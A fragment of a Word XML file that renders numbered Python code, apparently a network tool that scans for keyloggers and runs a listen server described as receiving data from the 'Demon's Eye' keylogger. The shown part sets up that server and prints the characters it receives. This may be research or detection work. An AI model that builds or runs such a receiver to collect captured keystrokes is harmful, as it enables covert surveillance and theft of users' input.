        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">''                                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Network Range to scan, if not provided, it detects itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">59   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">port_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">[]                                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Port list for command line test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">60   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_TIMEOUT                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Timeout on port connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">61   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_threads_launched </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">0                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Total threads launched</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">62   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_current_threads_running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">0                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Total threads running at one moment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">63   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">max_concurrent_threads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">0                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Store max concurrent threads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">64   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">keyloggers_found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= False                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># If keylogger is found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">65   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_server_enabled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= False                           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Is listen Server Enabled?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">66   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_server_instance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= None                           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Listen server object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">67   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">68   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">69   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">70   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># CLASSES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">71   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">72   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">73   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Server Class to receive Data form Demon's Eye Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">74   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ListenServer</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75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host_bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>listen_port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>max_clients</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>max_buffer_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">76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77   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_host_bind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">host_bind                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Interface to listen (blank, all)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">78   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_server_port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_port                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Listen port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">79   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_max_clients </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">max_clients                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Max number of keloggers to receive information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">80   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_max_buffer_size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">max_buffer_size             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Max buffer size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">81   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_server_socket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= None                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># This server socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">82   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_server_running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= False                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Control for shutdown server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">83   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">client_thread_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">[]                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># List of current clients</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">84   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">clients_processed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">0                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Counter of clients processed (only for statistics)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">85   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">86   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>kill_server</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87   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_server_running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>= False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">88   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">89   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">90   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>client_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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buffer_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">91   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Connection from {}:{:5d}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>format</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92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lastRenderedPageBreak/>
        <w:t xml:space="preserve">93   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># The input is in bytes, so decode it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">94   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">input_from_client_bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</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95   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">96   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Prints received chars</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">97   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>input_from_client_bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
